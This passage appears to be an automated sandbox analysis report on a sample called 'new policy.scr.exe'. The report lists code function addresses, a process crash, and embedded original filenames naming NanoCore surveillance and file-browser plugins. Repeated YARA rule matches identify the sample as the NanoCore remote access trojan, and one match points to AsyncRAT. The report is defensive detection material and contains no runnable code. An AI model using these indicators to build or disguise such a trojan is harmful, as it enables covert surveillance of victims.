Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D6720	7_2_055D6720
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D8200	7_2_055D8200
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D1290	7_2_055D1290
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_055D12A0	7_2_055D12A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057E4368	7_2_057E4368
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057E2CF1	7_2_057E2CF1
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057E0F1A	7_2_057E0F1A
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057EB5AF	7_2_057EB5AF
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_057E3087	7_2_057E3087
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594B928	7_2_0594B928
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_059498B0	7_2_059498B0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594E458	7_2_0594E458
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594B918	7_2_0594B918
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_059498A0	7_2_059498A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05949C03	7_2_05949C03
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594304A	7_2_0594304A
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594E44A	7_2_0594E44A
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594AE10	7_2_0594AE10
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_0594AE00	7_2_0594AE00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A6EFA0	7_2_05A6EFA0
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A6FB00	7_2_05A6FB00
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A6D088	7_2_05A6D088
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A50007	7_2_05A50007
Source: C:\Users\user\AppData\Roaming\Networks!.exe	Code function: 7_2_05A50040	7_2_05A50040

One or more processes crash

Source: C:\Users\user\Desktop\new policy.scr.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1336

Sample file is different than original file name gathered from version info

Source: new policy.scr.exe, 00000000.00000002.1883536648.0000000005510000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameXClient.exe4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1862029930.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000000.1641044218.0000000000992000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.0000000004268000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2866783271.0000000007720000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCoreClientPlugin.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858338720.0000000005980000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2869659382.0000000007930000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870782033.000000000798E000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.0000000004281000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2866874996.0000000007730000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000043F3000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2859613130.0000000005C30000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2868258629.00000000077D0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867384377.0000000007770000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameLzma#.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2858583023.00000000059E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867825853.00000000077A0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007950000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867712717.0000000007790000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2870061029.0000000007978000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2831215910.0000000001528000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs new policy.scr.exe
Source: new policy.scr.exe	Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe

Uses 32bit PE files

Source: new policy.scr.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e4629.11.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7790000.18.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 9.2.Networks!.exe.3e7b15e.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7920000.22.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7920000.22.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7930000.23.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.77b0000.20.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.59e0000.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.440a4ff.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7720000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.37445bd.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 0.2.new policy.scr.exe.3252f80.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 3.2.new policy.scr.exe.7770000.17.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 8.2.Networks!.exe.373b15e.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
Source: 3.2.new policy.scr.exe.77a0000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
